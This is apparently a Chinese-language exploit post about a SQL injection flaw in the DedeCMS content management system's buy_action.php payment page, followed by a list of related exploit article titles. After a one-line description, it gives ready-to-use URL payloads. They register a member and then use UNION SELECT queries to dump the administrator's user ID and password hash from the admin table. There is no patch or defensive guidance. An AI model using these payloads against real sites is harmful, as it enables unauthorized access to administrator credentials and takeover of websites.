DedeCMS 支付页面注入漏洞
2011-07-06 02:13
471 查看
发布日期:2011-03.23
发布作者:佚名
影响版本:dodecms.
官方网站:http://www.dedecms.com
漏洞类型:SQL注入
漏洞描述:DedeCMS. 织梦buy_action.php存在注入,可利用SQL查询代码爆管理员用户密码。
漏洞测试:
首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew
爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*
爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*
相关文章推荐
- dedecms会员注册注入漏洞
- 织梦dedecms漏洞修复大全注入漏洞
- dedecms5.7最新注入和上传漏洞
- DedeCMS反馈页面SQL注入漏洞
- [通杀]dedecms plus/search.php 注入漏洞利用EXP
- 织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
- dedecms tag.php注入漏洞分析与利用工具
- 织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
- DedeCms 5.7友情链接模块注入漏洞
- 织梦DEDECMS search.php注入漏洞EXP[通杀]
- ecshop支付漏洞手工注入 解决方案
- 织梦内容管理系统(DedeCms) 小说模块insert注入漏洞
- dedecms最新注入漏洞
- 千博企业网站管理系统HitCount.Asp页面注入漏洞
- dedecms5.7注入和上传漏洞
- dedecms plus/search.php 注入漏洞利用EXP
- 织梦dedecms5.5爆最新漏洞,可得到webshell
- dedecms搜索页面不能使用arclist等标签的解决方法
- dedecms最新漏洞,可提权,
- 微信公众号之微信支付(V3版)jsp页面jsapi统一下单调启支付(java版)